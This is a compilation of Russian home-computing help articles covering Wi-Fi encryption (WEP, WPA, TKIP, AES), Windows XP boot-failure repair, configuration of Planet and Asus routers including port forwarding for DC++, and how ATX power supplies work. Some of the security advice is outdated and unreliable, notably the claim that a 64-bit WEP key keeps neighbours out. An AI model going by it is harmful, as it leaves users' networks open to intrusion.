Первым стандартом, использующимся для шифрования данных в беспроводных сетях, был стандарт WEP (Wired Equivalent Privacy). В соответствии со стандартом WEP шифрование осуществляется с помощью 40-или 104-битного ключа (некоторые модели беспроводного оборудования поддерживают и более длинные ключи), а сам ключ представляет собой набор ASCII-символов длиной 5 (для 40-битного) или 13 (для 104-битного ключа) символов. Набор этих символов переводится в последовательность шестнадцатеричных цифр, которые и являются ключом. Допустимо также вместо набора ASCII-символов напрямую использовать шестнадцатеричные значения (той же длины).
Как правило, в утилитах настройки беспроводного оборудования указываются не 40-или 104-битные ключи, а 64-или 128-битные. Дело в том, что 40 или 104 бита — это статическая часть ключа, к которой добавляется 24-битный вектор инициализации, необходимый для рандомизации статической части ключа. Вектор инициализации выбирается случайным образом и динамически меняется во время работы. В результате c учётом вектора инициализации общая длина ключа получается равной 64 (40+24) или 128 (104+24) битам.
Протокол WEP-шифрования, даже со 128-битным ключом, считается не очень стойким, поэтому в устройствах стандарта 802.11g поддерживается улучшенный алгоритм шифрования WPA — Wi-Fi Protected Access, который включает протоколы 802.1х, EAP, TKIP и MIC.
Протокол 802.1х — это протокол аутентификации пользователей. Для своей работы данный протокол требует наличия выделенного RADIUS-сервера, которого в домашней сети, естественно, нет. Поэтому воспользоваться данным протоколом в домашних условиях не удастся.
Протокол TKIP (Temporal Key Integrity Protocol) — это реализация динамических ключей шифрования. Ключи шифрования имеют длину 128 бит и генерируются по сложному алгоритму, а общее количество возможных вариантов ключей достигает сотни миллиардов, и меняются они очень часто.
Протокол MIC (Message Integrity Check) — это протокол проверки целостности пакетов. Протокол позволяет отбрасывать пакеты, которые были «вставлены» в канал третьим лицом.
Помимо упомянутых протоколов, многие производители беспроводного оборудования встраивают в свои решения поддержку стандарта AES (Advanced Encryption Standard), который приходит на замену TKIP.
Итак, после небольшого экскурса в основные понятия технологии шифрования и сетевой аутентификации пользователей приступим к настройке нашего беспроводного оборудования. При этом будем по возможности придерживаться следующих рекомендаций: если все устройства в сети поддерживают шифрование на основе WPA, мы будем использовать именно этот способ шифрования (в противном случае следует выбрать WEP-шифрование со 128-битным ключом). Ну а если все устройства в сети поддерживают AES-шифрование, то воспользуемся именно им.
Начнём с настройки беспроводной точки доступа. Прежде всего, выберем тип аутентификации (Authentication). В списке типа аутентификации возможны следующие варианты:
Open System (открытая); Shared Key (общая); 802.1х; WPA; WPA Pre-shared key.
Open System (режим по умолчанию) — фактически это режим, не имеющий сетевой аутентификации. При выборе данного режима для входа в беспроводную сеть достаточно знать лишь идентификатор сети (SSID).
В режиме Shared Key возможно использование WEP-шифрования трафика. Причём для входа в сеть требуется установить общий для всей сети WEP-ключ шифрования.
Настройка WEP-шифрования
Если по каким-либо соображениям принято решение использовать WEP-шифрование, то необходимо установить тип аутентификации Shared Key. Далее следует установить размер ключа (рекомендуемое значение 128 бит) и ввести сам ключ. К примеру, ключ можно записать в шестнадцатеричном формате: 00-11-22-33-44-55-66-77-88-aa-bb-cc-dd. Всего возможно задать до четырёх значений ключа, и, если задано несколько ключей, необходимо указать, какой именно из них используется.
Далее требуется реализовать аналогичные настройки на всех беспроводных адаптерах сетевых компьютеров. Делается это либо с помощью утилиты управления (в нашем случае Intel PROSet/Wireless), либо посредством клиента Microsoft. Если используется утилита Intel PROSet/Wireless, откройте главное окно утилиты, выберите профиль соединения и нажмите на кнопку «Свойства…». В открывшемся диалоговом окне (рис. 11) перейдите к закладке «Настройка защиты» и выберите тип сетевой аутентификации «Общая» (это соответствует типу Shared Key). Далее выберите тип шифрования WEP, задайте длину ключа 128 бит и введите ключ шифрования (00-11-22-33-44-55-66-77-88-aa-bb-cc-dd).

Рис. 11. Задание параметров WEP-шифрования на беспроводном адаптере с помощью утилиты Intel PROSet/Wireless
При использовании для настройки адаптера клиента Microsoft откройте диалоговое окно Wireless Network Connection Properties (Свойства беспроводного сетевого соединения) и на вкладке «Wireless Networks» (беспроводные сети) выберите нужный профиль беспроводного соединения. Нажмите на кнопку «Properties» (Свойства) и в открывшемся диалоговом окне (рис. 12) установите тип сетевой аутентификации (Network Authentication) Shared, тип шифрования (Data encryption) WEP и введите точно такой же ключ шифрования, который был задан при настройке точки доступа.

Рис. 12. Задание параметров WEP-шифрования на беспроводном адаптере с помощью клиента Microsoft
Настройка WPA-шифрования
Если есть возможность использовать WPA-шифрование (то есть если все устройства сети его поддерживают), то рекомендуется выбрать именно этот тип шифрования.
Существует два типа WPA-шифрования: стандартный режим WPA (иногда встречается название WPA — Enterprise) и WPA Pre-shared key или WPA — персональный.
Режим WPA — Enterprise используется в корпоративных сетях, поскольку требует наличия RADIUS-сервера. Естественно, что в домашних условиях воспользоваться данным режимом не удастся.
А вот режим WPA Pre-shared key предназначен для персонального использования. Этот режим предусматривает использование заранее заданных ключей шифрования (пароль доступа), одинаковых для всех сетевых устройств, а первичная аутентификация пользователей осуществляется с использованием данного ключа.
Существует также алгоритм WPA 2 (следующая версия протокола WPA). Если все устройства беспроводной сети поддерживают данный режим, то вполне можно им воспользоваться. Настройки в данном случае осуществляются точно такие же, как и в случае WPA-режима.
В качестве алгоритмов шифрования при использовании стандарта WPA можно выбрать TKIP или AES.
Для настройки WPA-шифрования в главном окне настройки точки доступа выберите тип аутентификации WPA Pre-shared key и установите тип шифрования (WPA Encryption) TKIP или AES. Затем требуется задать ключ шифрования (WPA PSK Passphrase). В качестве ключа может быть любое слово (например, FERRA).
Далее необходимо реализовать аналогичные настройки на всех беспроводных адаптерах сетевых компьютеров. Делается это точно так же, как и в случае уже рассмотренного нами WEP-шифрования. Пример настройки беспроводного адаптера при помощи утилиты управления Intel PROSet / Wireless показан на рис. 13.

Рис. 13. Пример настройки WPA-шифрования на беспроводном адаптере с помощью утилиты Intel PROSet/Wireless
Не загружается Windows. Самые распространённые причины отказа загрузки:
На практике зачастую бывает так, что в один прекрасный день ваш электронный друг не загружает операционную систему…. Зачастую это выражается в выводе на монитор сообщения типа: «disk boot failure, insert system disk and press enter». Причин поломки компьютера, связанных с выводом данного сообщения, как правило, может быть несколько:
В дисковод вставлен диск, который не является загрузочным. При этом в BIOS системной платы последовательность загрузки начинается именно с этого дисковода. В порт USB компьютера вставлена флешка которая также не является загрузочной, а вследствие особенностей BIOS конкретной материнской платы, компьютер пытается загрузиться именно с неё. Вышел из строя жёсткий диск с установленной на нём операционной системой.

Ecли в первых двух случаях проблема решается путём настройки BIOS или банальным извлечением дискетки или флешки из ПК, то в третьем случае, как правило, требуется замена жёсткого диска с последующей установкой операционной системы, драйверов и программ. Вся информация со старого жёсткого диска, в большинстве случаев, оказывается безвозвратно утрачена. Между тем бывает и так что компьютер, отказываясь загружать Windows, выводит сообщения другого рода типа: «Не удаётся запустить Windows из-за отсутствующего или повреждённого файла C: \Windows\system32\…..
Рекомендуется запустить консоль восстановления выбрав клавишу “r” в меню выбора установки Windows» или нечто аналогисное по смыслу. В данном случае такое сообщение говорит о том, что по какой-то причине загрузчик ОС не может найти или прочесть важный системный файл необходимый для нормальной загрузки Windows.
Здесь вариантов этого сбоя может быть гораздо больше:
— Данный файл был повреждён или удалён вследствие некорректной установки какого-нибудь программного обеспечения (зачастую различные «кряки», «кейгены» и т. п.);
— Данный файл был повреждён или удалён вследствие воздействия вируса или другого вредоносного ПО;
— Некорректная установка драйвера оборудования (драйвер не соответствует версии операционной системы или конкретному оборудованию).
— Данный файл был повреждён вследствие сбоя электропитания, к примеру, если вдруг внезапно отключили электричество, а ваш компьютер не подключен к источнику бесперебойного питания;
— Данный файл был повреждён вследствие возникновения ошибок в файловой системе жёсткого диска и (или) физического повреждения его поверхности;
— Данный файл был испорчен из-за повреждения оперативной памяти компьютера (битая ячейка или блок);
Это основные возможные варианты, хотя имеются ещё несколько о которых я не стану упоминать что бы не выходить за рамки данной статьи.
Так что же делать и как восстановить работу ПК в этом случае? Для первых трёх вариантов описанных выше можно попытаться восстановить испорченный или отсутствующий файл выполнив загрузку с оригинального диска с дистрибутивом Windows XP и выбрать как вариант загрузки консоль восстановления. Для этого необходимо нажать клавишу «r». В консоли нужно ввести команду типа: «expand E: \i386\sp2.cab /f: ntosrnl.exe С: \windows\system32 \y». То есть мы говорим, что необходимый нам такой-то файл нужно извлечь из САВ-архива расположенного на диске с дистрибутивом ОС Windows XP и скопировать его затем в папку «system32» в директории Windows.
— sp2.cab является переменной, то есть CAB-архив на диске с дистрибутивом, откуда после его распаковки будет извлечён необходимый нам файл;
— ntosrnl.exe (приведён для примера) также переменная являющаяся непосредственно самим файлом, который нужно восстановить;
— диски E и С: CD-дисковод и соответственно системный раздел жёсткого диска, где установлена операционная система.
В случае если всё сделано правильно и Windows после данной процедуры успешно загрузилась, рекомендуем незамедлительно скопировать важную информацию в безопасное место после чего провести проверку ПК на наличие вирусов, а также не помешает просканировать жёсткий диск и оперативную память на предмет наличия сбойных секторов и «битых» ячеек утилитами типа MHDD и Memtest86+ соответственно.
Однако всё же подчеркнём, что такого рода процедуры необходимо проводить знающему специалисту с полным пониманием того, что он делает. Поэтому в подобных ситуациях рекомендуем вызвать квалифицированного компьютерного мастера для полной и точной диагностики причины возникновения данной проблемы.
Как настроить роутер — маршрутизатор — для работы в составе домашней локальной сети
Инструкция по настройке WiFi роутера Planet WRT-414.

Итак начнём. Для начала роутер необходимо подключить к одному из персональных компьютеров патчкордом который идёт с ним в комплекте, а так же подключить сетевой адаптер роутера в сеть ~220 в. В инструкции к маршрутизатору должен быть указан его ip-адрес, логин и пароль администратора для входа в панель настроек. Обычно ip-адрес маршрутизатора бывает 192.168.0.1 или 192.168.1.1, а логин и пароль администратора admin admin соответственно. Нужно иметь ввиду, что у различных производителей ip-адрес, пароль и логин могут различаться, но в любом случае вы узнаете его из мануала по вашему роутеру. В нашем примере роутера Planet WRT-414 мы имеем ip-адрес 192.168.0.1, логин — admin, пароль — admin.
Кабель от компьютера к роутеру подключили, адаптер питания тоже. Заходим в сетевые подключения, находим подключение по локальной сети, открываем его свойства, и в параметрах протокола TCP/IP выставляем ip-адрес 192.168.0.2 маску сети 255.255.255.0. Сораняем изменения. в трее должно выскочить сообщение типа: Поключение по локальной сети 100Mbit/sec. Открываем любой интернет-браузер, в нашем случае — Internet Explorer, в строке адреса вводим 192.168.0.1 и нажимаем Enter. Если всё сделано правильно, то должно выскочить окно ввода логина и пароля для доступа к настройкам роутера типа этого:

Вводим admin и admin в поля имя пользователя и пароль соответственно. Нажимаем ОК. После этого нам открывается главное окно настроек нашего маршрутизатора. Какие параметры необходимо настроить что бы роутер стал раздавать интернет всем компьютерам в локальной сети? Основные настройки это: ip-адрес, маска сети, шлюз, dns-серверы вашего интернет провайдера. Эти настройки вводятся на вкладке WAN, или внешняя сеть. Затем нужно настроить параметры вашей внутренней, домашней сети или попросту LAN. Этими настройками являются также как и в предыдущем случае ip-адрес, маска сети, шлюз, dns-серверы. Только этим параметрам будет присвоено иное значение, значение вашей внутренней сети. Затем настраивается беспроводная WiFi сеть, её имя, номер канала, степень и способ защиты от несанкционированного подключения к этой сети другими лицами. Обьясним на примере.

Главное окно настроек маршрутизатора. Выбираем General Setup.

Идём по порядку, сначала выбираем System.

Как видно, на закладке Time Zone можно настроить временной часовой пояс

На вкладке Password Settings имеется возможность изменить пароль по умолчанию (admin) на другой. Сначала вводится старый пароль, потом дважды — новый. На закладке Remote Management устанавливаются параметры удалённого администрирования роутера (через интернет). Тут ничего менять не следует, пусть останется по умолчанию. Идем дальше — настройки внешней сети вашего интернет-провайдера. Вкладка WAN.

Здесь нужно выбрать тот тип подключения, который применяется провайдером к вашему интернет-соединению. Типы подключения бывают разными. Основные распространённые на сегодня это: стаический ip-адрес, динамический ip-адрес и соединения по протоколу PPTP или VPN. В нашем с вами случае используется статический ip-адрес, его и будем настраивать.

Как видно из данного скриншота мы ввели предоставленный по договору нашим интернет-провайдером ip-адрес 10.44.2.29, маску сети 255.255.255.0, адрес DNS-сервера 10.59.3.19 и шлюз 10.44.2.5. На закладке DNS можно ввести адрес дополнительного (альтернативного) DNS-сервера. Если провайдер предоставил нам его ip, то вводим его в соответствующее поле.

Не забываем нажимать ОК после внесения любых изменений в настройки роутера и двигаемся дальше. Теперь настало время настроить параметры нашей внутренней компьютерной сети. Ну что ж приступаем — переходим на закладку LAN.

На этой вкладке нашему вниманию представлены настройки внутренней локальной сети, то есть сети куда роутер будет раздавать интернет из внешнего канала провайдера. Как видим, у нас есть ip-адрес роутера — 192.168.0.1, маска внутренней сети — 255.255.255.0, а также стоит значение Enabled в строке DHCP Server. Что означает эта строка? DHCP-сервер это устройство которое выдаёт компьютерам внутренней сети в аренду ip-адреса из заданного диапазона. Это избавляет пользователей вручную назначать ip-адреса, маску, шлюз и DNS на компьютерах домашней сети. Данный процесс полностью автоматизирован посредством службы DHCP. Поэтому её лучше включить нежели выключать. Почти во всех современных роутерах DHCP включена по умолчанию, так что в большинстве случаев первоначальную настройку компьютера при соединении с роутером производить не приходится. Строки Start IP и End IP определяют как раз тот диапазон из которого будут арендоваться ip-адреса компьютерам внутренней локальной сети, причем без разницы как они подключены к маршрутизатору — проводом или по беспроводной сети WiFi. Далее переходим на вкладку настройки того самого wifi.

Закладка Wireless Settings состоит и несколькиз вкладок на которых нужно настроить включена или выключена wifi сеть роутера, задать желательно уникальное имя сети на английском языке, выставить параметры безопасности — номер радиоканала, способ и сложность шифрования данных, а так же пароль для доступа к вашей wifi сети.

В нашем случае ESSID — это имя wifi сети, Channel Namber — номер радиоканала, MODE — режим передачи данных по wifi. Все оставляем по умолчанию кроме имени сети и номера канала. Их задаем вручную. Сохраняем изменения и переходим на следующую вкладку Advanced Settings (расширенные установки настроек wifi роутера)

В данном случае оставляем всё как есть, ничего тут изменять не нужно. переходим на вкладку Security Settings (настройки безопасности)

В данном случае: Encryption — метод шифрования, мы выбрали WPA pre-shared key, его тип — TKIP, и пароль доступа к нашей локальной сети — PRE-shared Key. Его задаём произвольно и хорошенько запоминаем или записываем:-). Все больше тут настраивать ничего нам не требуется. Переходим на закладку NAT.

NAT должен быть включён, иначе не видать вам интернета как своих ушей:-). Переходим на закладку Firewall (сетевой фильтр) или брандмауэр.

Настоятельно рекомендуем не выключать файрволл ибо в этом случае никто и никогда не даст вам гарантию, что какой-нибудь молодой да ранний горе-хакер не залезет к вам в компьютер и не напакостит там от души:-). В случае если файрвол вы в роутере все же захотите отключить, то активируйте хотя бы брэндмауэр Windows. Всё, на этом настройка роутера закончена. Сохраняем все изменения и перезагружаем роутер. Если вы всё сделали правильно, ничего не напутали, то после того как вы подключите кабель интернет-провайдера в разъём роутера под названием WAN, интернет должен появиться на всех компьютерах вашей локальной сети (включая беспроводные соединения). Между тем интернет может и не появиться:-). И это будет вызвано не потому, что вы что-то не так настроили, а потому что многие интернет-провайдеры используют защиту от несанкционированного использования третьими лицами вашего интернет-канала, которая устроена на базе уникальности так называемых MAC-адресов сетевой карты компьютера который был изначально подключен по договору предоставления интернет-услуг. Иными словами то, что вам нужно сделать так это позвонить в службу поддержки вашего интернет провайдера и сообщить им, что вы установили роутер и попросить их снять привязку по старому MAC-адресу. Провайдер обновит в своей базе МАС-адресов прежний адрес на MAC-адрес роутера и, о чудо! долгожданный интернет появится у всех компьютеров ашей домашней локальной сети. Между тем, этого можно и не делать — читать дальше:-)
У многих современных моделей маршрутизаторов сейчас имеется очень полезная функция: клонирование MAC-адреса. Что же это такое и с чем его едят? Клонирование MAC-адреса бывает полезно тогда, когда вам нужно что бы у вновь установленного роутера был тот же самый MAC-адрес, который использовался при первоначальной настройке Интернет на компьютере при подключении провайдером. Иными словами в локальных сетях, где есть привязка по МАС-адресу, при настройке сети в базу МАС-адресов сервера провайдера заносится МАС-адрес компьютера на котором производилась первоначальная настройка. Теперь представим, что в какой-то момент у вас дома появляется второй компьютер или ноутбук который вы так же хотите подключить к Интернет. Собственно для этого вы и приобретаете маршрутизатор, который, как известно, имеет свой, уникальный МАС-адрес. Так вот, что бы не просить провайдера сменить имеющийся МАС-адрес на новый, и придумали опцию , которая позволяет скопировать (или склонировать) МАС-адрес компьютера на роутер. Для этого в настройках роутера или в необходимо найти опцию или что-нибудь похожее по смыслу, и ввести в соответствующее окошко настроек МАС-адрес компьютера, который можно предварительно посмотреть в настройках активного сетевого соединения. Для этого (в Windows XP) нужно при подключенном к компьютеру кабеле провайдера щёлкнуть по изображению сетевого подключения в трее возле часов, затем в открывшемся окне свойств сетевого подключения выбрать вкладку ПОДДЕРЖКА и нажать на кнопку ПОДРОБНОСТИ. Тут необходимо отметить, что названия МАС-адрес и Физический адрес, в принципе, одно и то же.
В заключение хочется надеяться, что данная статья была вам полезна и вы по аналогии нашего примера с PLANET WRT-414 смогли самостоятельно настроить свой роутер для совместного использования интернета.
Инструкция по настройке WiFi роутера Asus WL-520GC
После подключения нашего кабеля, входящего в Вашу квартиру к точке доступа, необходимо сделать первичные настройки на Вашей сетевой карте. Для этого необходимо зайти в свойства сетевой карты, далее в свойства протокола интернета TCP/IP и выставим параметры в соответствии с картинкой:
Настройку беспроводной сети в маршрутизаторе будем производить через веб-конфигуратор устройства. Для первоначальной настройки Wi-Fi подключитесь к маршрутизатору через Ethernet-кабель. Запустите браузер Internet Explorer и в адресной строке наберите 192.168.1.1. Далее в появившемся окне необходимо нажать кнопку Login.
В появившемся окне авторизации ввести Имя пользователя admin и пароль admin, затем нажать ОК.
Далее переходим на закладку IP Config — WAN & LAN. Здесь необходимо выставить следующие настройки:
1) WAN Connection Type: PPTP
2) IP адрес, маску и адрес шлюза взять с регистрационной карточки абонента или уточнить в тех-поддержке. (Пример: IP Address (IP адрес) — 10.0.x.x; Subnet Mask (маска подсети) — 255.255.255.192; Default Gateway (шлюз) — 10.0.х. х)
3) Get DNS Server automatically? — No
DNS Server1: 195.98.64.65 DNS Server2: 195.98.64.66
4) User name — Ваш логин (учетное имя)
5) Password — Ваш пароль
6) Host Name: pptp.freedom
7) Host Server: pptp.freedom
Далее нажать Apply.
Далее переходим на закладку IP Config — Route.
Apply to routing table? — Yes
Затем вводим постоянный маршрут. Для этого последовательно вводим в Network/Host IP — IP адрес (согласно рисунку), в Netmask — маску (согласно рисунку), в Gateway — Ваш шлюз, Interface — MAN. После введения первой строчки нажать Add (строчка добавится в Static Route List) и вводить аналогично вторую строчку, затем третью. Затем нажать Apply.
Затем перейти в закладку Wireless — Interface.
Для обеспечения защищенного беспроводного соединения в маршрутизаторе укажите следующие настройки:
Wireless Mode — 54G Only
Authentication Method — WPA-Personal
WPA Encryption — TKIP+AES
WPA Pre-Shared Key — введите ключ шифрования длиной от 8 до 63 символов. Используемый ключ нужно будет указывать при подключении клиентов к точке доступа.
WEP Encryption — None
Key Index — Key2
Network Key Rotation Interval — 0
Затем нажать Apply.
Затем переходим на закладку Wireless — Bridge
AP Mode — AP Only
Channel — 10
Connect to APs in Remote Bridge List? — No
Затем нажать Apply.
Затем переходим на закладку Wireless — Access Control
MAC Access Mode — Disable
Затем нажимаем Apply
В появившемся окне нажимаем Save&Restart
Чтобы изменить пароль необходимо зайти на закладку System Setup — Change Password. В New Password ввести новый пароль, в Retype New Password — подтверждение пароля и нажать Save.
Теперь необходимо настроить беспроводное сетевое соединение на Вашем компьютере. Для этого необходимо зайти в меню Пуск/Панель Управления/Сетевые подключения. Правой кнопкой мыши выберете сетевую карту («Беспроводное соединение») и в контекстном меню выберете пункт «Свойства».
С помощью полосы прокрутки выберете пункт «Протокол Интернета (TCP/IP)» и нажмите кнопку «Свойства».
Во вкладке «Общие» заполните пункты как указано на рисунке. Нажмите кнопку «OK».
Настроим параметры wi-fi карты на шифрование. Для этого щелкаем на ярлыке сетевой карты в правом нижнем углу экрана, рядом с часами. Выбираем установить беспроводную сеть.

Производим настройку через мастер «Далее».
Вводите сетевое имя (default) по умолчанию. Отмечаете пункты как на рисунке.
Ключ сети это пароль который Вы задали при настройке точки доступа.
Устанавливаете сеть вручную.
Пункт «Готово» завершает настройку
Еще статья: Настройка роутера+WiFi точки доступа ASUS WL-520G.
После покупки оказалось, что настроить роутер — это занятие слегка более сложное, чем, например, установка планочки оперативки или даже принтера, видеокарты и т д. Промучившись дня два-три и задавая кучу глупых вопросов на данном форуме (interzet.ru), не получив ни одного вразумительного ответа (ответы были, но предполагали знание матчасти пользователя, а у меня ее на тот момент не было совсем) решил написать небольшую, но подробную пошаговую инструкцию, в которую, возможно, сам когда-нибудь подгляжу.
1. Начальные условия: стационарный компьютер (далее по тексту Большой Брат или ББ) ИМЕЕТСЯ (с Windows XP, подойдет и ноутбук) и он УЖЕ подключен к Интернету сети interzet (работает интернет, почта, Strong DC++ и т. д.).
2. Заходим: «Пуск»-«панель управления»-«сетевые подкючения» — правой кнопкой мыши по «подключение по локальной сети»-«свойства» — из списка выбрать «Протокол интернета TCP/IP» — нажать на загоревшуюся кнопку «свойства». Переписываем данные (если они еще не переписаны, провайдер, по идее, их записал вам на листочек при подключении компа к инету) в полях: «ip-адрес», «Маска подсети», «Основной шлюз» и «Предпочитаемы DNS сервер». После этого ставим кружочки в поля «Получить IP адрес автоматически» и «Получить DNS сервера автоматически». Как результат — все ненужные циферки — исчезнут.
4. Достаем из сетевой карты ББ сетевой кабель (разъем RJ-45), в освободившееся гнездо втыкаем кабель от роутера (идет в комплекте), другой конец кабеля втыкаем в сам роутер Asus WL-520G (должен быть подключен к розетке) в гнездо LAN1. Ждем, пока все законтачится (в правом нижнем углу виден процесс).
5. Нажимаем «Пуск»—«Мой компьютер» — в адресной строке пишем: 192.168.1.1. В диалоговом окне пишем пользователь — admin, пароль — admin. Нажимаем ОК. Если вы что-то увидели (вроде красивой страницы ASUS) — это КРУТО, потому что вы теперь имеете доступ к настройкам точки доступа через браузер вашего компьютера. Если вы ничего подобного не увидели — попробуйте сбросить настройки вашего роутера (наверняка вы чета уже нахимичили), для этого держите в течении трех секунд кнопочку «Reset» на попе вашего Asus.
6. Нажимаем в левом столбце на «Quick Setup» окна браузера. Выбираем часовой пояс «+03, Moscow», нажимаем «next». Ставим кружочек в положение «Cable Modem or other connection type that gets IP automatically» Нажимаем два раза «next» (поле с IP адресами пропускаем, они нам в этом месте не нужны) и «Finish» и ждем перезагрузку устройства Asus (20 секунд). Результатом этого пункта будет присвоение MAC адреса вашей реальной сетевухи вашему роутеру. Без этого не будет Интернета.
7. Снова нажимаем в левом столбце на «Quick Setup» окна браузера. Выбираем часовой пояс «+03, Moscow», нажимаем «next». Ставим кружочек в положение «ADSL or other connection type that uses static IP address». Нажимаем «next» и вписываем те настройки, которые дал вам оператор (ip, маска, шлюз, днс). Если вы не понимаете, о чем идет речь, то это те самые настройки, которые вы переписали на листочке в п.2 данной инструкции. Нажимаем «next» даете полю SSID имя «Voffka», Security Level: Low(None), нажимаем Finish и ждем 20 секунд. Втыкаем в гнездо WAN (на попе роутера) сетевой кабель (тот самые, который дал вам провайдер). Ждем секунд 20. Заходим: «пуск»-«панель управления»-«сетевые подкючения» — там по идее появился новый значок: шлюз Интернета, подключено. Если все так, то поздравляю, теперь есть интернет на вашем ББ! Убедиться в этом можно набрав в окне браузера «ya.ru». На вашем ноутбуке или КПК (с WiFi), соответственно, тоже при соединении он появится (расписывать не буду, абсолютно ничего сложного).
8. На данный момент ваша WiFi сеть не защищена. Для ее защиты необходимо зайти в настройки вашего роутера (п.5) и нажать там «Wireless», выбираем метод шифрования «Authentication Method», например «Shared Key», например 64 bit и в поле «WEP Key 1 (10 or 26 hex digits)» введите пароль, например, «9215877081». «Finish» и перегрузка. Все, ваша сеть зашифрована, т. е. подсоединиться к ней сможете только вы, а ваш сосед останется в пролете, потому что он не знает пароля.
9. Интернет у вас уже есть. Но! Если у вас перестал работать STRONG DC++ (точнее, он то работает, но «поиск», например, не работает), то читаем дальше.
10. Открываем Strong DC++, нажимаем «Файл»-«Настройки»-«Сетевые настройки». В поле «ip компьютера» пишем реальный внутренний (локальный) адрес вашего компа НА ДАННЫЙ момент (скорее всего, 192.168.1.2). Чтоб его узнать наверняка, нажимаем «Пуск»—«Выполнить»—ввести «CMD». Появится командная строка виндовс. Вводим туда, где мигает курсор: «ipconfig /all» и смотрим строчку «IP-adress». Скорее всего (если вы делаете все в той последовательности, как я здесь написал), это будет 192.168.1.2.
11. Ставим кружочек на «Firewall с ручным перенаправлением портов» и вписываем в поле «внешний WAN/IP» тот самый IP, который выдал вам провайдер (тот самый, который вы выписали первой строчкой на своем листочке в п.2), а также ставим галочку «Don’t allow HUB/UPnP to override»
12. Выписываем на листочек порты TCP и UDP.
13. Заходим в настройки вашего роутера (п.5) и нажимаем на «NAT Settings»-«Virtual Server». Ставим кружочек «Enable Virtual Server?» в положение «Yes».
14. Теперь надо заполнить «Virtual Server List». Поле «Well-Known Applications» — будет «User Defined». Далее, нам необходимо сделать ЧЕТЫРЕ строчки. Для этого в полях ПОСЛЕДОВАТЕЛЬНО вбиваем по одной (порт Рэндж, локал АйПи, Локал Порт, Протокол, Описание) строчке и нажимаем кнопочку «add». В первых двух строчках в полях «Port Range» и «Local Port» у вас будут фигурировать первое значение из записанных на листочке (п. 12), в третьей и четвертой строчке — второе значение.
15. В итоге получаем примерно вот такую штуку:
9392 192.168.1.2 9392 TCP strongdc
9392 192.168.1.2 9392 UDP strongdc
14466 192.168.1.2 14466 TCP strongdc
14466 192.168.1.2 14666 UDP strongdc
Где «9392» — TCP порт из настроек DC++, а «14466» — это UDP порт. Списал с листочка. А 192.168.1.2 — это реальный ip адрес вашего ББ
Теперь можно перезапускать DC++ (выключить и включить), ждать секунд 10, пока все найдется и сконнектится. Ура!?
Не забудьте проверить настройки вашего файрволла, DC++ не должна быть им блокирована, как вы сами понимаете.
ВНИМАНИЕ! Если роутер долго находится в бездействии, он имеет тенденцию подвисать» из-за скачков напряжения в сети. В этом режиме роутер через по проводу работает корректно, но по безпроводному интерфейсу его не видно (как будто его вовсе нет, но еще вчера все работало). Просто прервите питание роутера на 1 секунду (я выдергиваю и вставяю кабель питания) или ставьте ИБП.
Как работают блоки питания персональных компьютеров? Какие блоки питания бывают?

Блок питания — жизненно важная часть компьютера, без которой его функционирование невозможно. Лишенный блока питания компьютер — всего лишь мертвая коробка, наполненная пластиком и металлом.
Блок питания преобразует напряжение сети переменного тока в различные напряжения постоянного тока, необходимые для электропитания компонентов персонального компьютера.
В этой статье рассматривается принцип работы блоков питания ПК и разъясняется, что такое максимально допустимая мощность.
Блоки питания ATX
Блок питания персонального компьютера (ПК) представляет собой металлическую коробку, которую обычно располагают в углу корпуса. Часто он виден с тыльной стороны корпуса, так как содержит гнездо для подключения сетевого шнура и вентилятор охлаждения.
Такие блоки питания часто называют импульсными источниками питания, поскольку для преобразования напряжения сети переменного тока в меньшие напряжения питания постоянного тока в них используются ключевые преобразователи. Как правило, на выходе блока питания ПК имеются следующие напряжения: 3,3 вольта; 5 вольт; 12 вольт.
Напряжения 3,3 и 5 вольт обычно используются для питания цифровых схем, а 12 вольт — для обеспечения работы вентиляторов и электродвигателей дисководов. Основным параметром блока питания является его мощность в ваттах. Мощность в ваттах равна произведению значения напряжения, измеряемого в вольтах, и значения тока, измеряемого в амперах. Пользователи со стажем, наверное, помнят, что в первых компьютерах были большие красные переключатели, от положения которых зависело состояние компьютера. Этими переключателями питание компьютера отключалось вручную. Фактически с их помощью включалась или отключалась подача на блок питания сетевого напряжения 220 вольт.
В современных компьютерах подача питания включается с помощью маленькой кнопки, а отключение машины производится путем выбора соответствующего пункта меню. Такие возможности управления блоками питания появились несколько лет тому назад. Операционная система имеет возможность отправлять на блок питания управляющий сигнал выключения. Нажимная кнопка подает на блок питания команду включения в форме сигнала напряжением 5 вольт. В блоке питания имеется схема, вырабатывающая напряжение питания 5 вольт, которое именуется VSB, для обеспечения наличия «дежурного напряжения» даже в условиях, когда блок питания считается выключенным, благодаря чему может функционировать кнопка включения.
Импульсные преобразователи напряжения
Приблизительно до 1980-х годов источники питания были тяжелые и большие. В них для преобразования напряжения электрической сети 220 вольт частотой 50 герц в напряжения 5 вольт и 12 вольт постоянного тока использовались большие тяжелые трансформаторы и большие конденсаторы (по размеру такие же, как металлические банки для газированной воды).
Использующиеся для этих целей в настоящее время импульсные источники питания значительно меньше и легче. Они преобразуют электрический ток частотой 50 герц (Гц, или колебаний в секунду) в ток более высокой частоты. Благодаря такому преобразованию для понижения напряжения с 220 вольт до напряжений, требующихся для отдельных компонентов компьютера, можно использовать маленький легкий трансформатор. Переменный ток более высокой частоты, поступающий из блока питания, легче выпрямлять и фильтровать, по сравнению с исходным напряжением сети переменного тока 50 Гц, что позволяет уменьшить пульсации питающего напряжения для чувствительных электронных компонентов компьютера.
Импульсный блок питания потребляет от электрической сети лишь столько электричества, сколько необходимо. Выходные напряжения и токи блока питания указываются на прикрепляемой к этому блоку наклейке.
Импульсные преобразователи используются также для получения переменного тока из постоянного, например, в источниках бесперебойного питания и автомобильных инверторах, которые служат для питания от автомобильного аккумулятора устройств, рассчитанных на питание от переменного тока. Импульсный преобразователь автомобильного инвертора преобразует постоянный ток, потребляемый от автомобильного аккумулятора, в переменный ток. Переменный ток используется в трансформаторе инвертора для повышения напряжения до величины, необходимой для питания бытовых приборов (220 вольт переменного тока).
Стандартизация блоков питания
Для персональных компьютеров за всю их историю было разработано по крайней мере шесть различных стандартных блоков питания. В последнее время промышленность по установившейся практике выпускает блоки питания на базе ATX. ATX — промышленная спецификация, устанавливающая такие требования к блокам питания, чтобы они подходили к стандартному корпусу ATX, а их электрические характеристики обеспечивали бы функционирование материнской платы ATX.
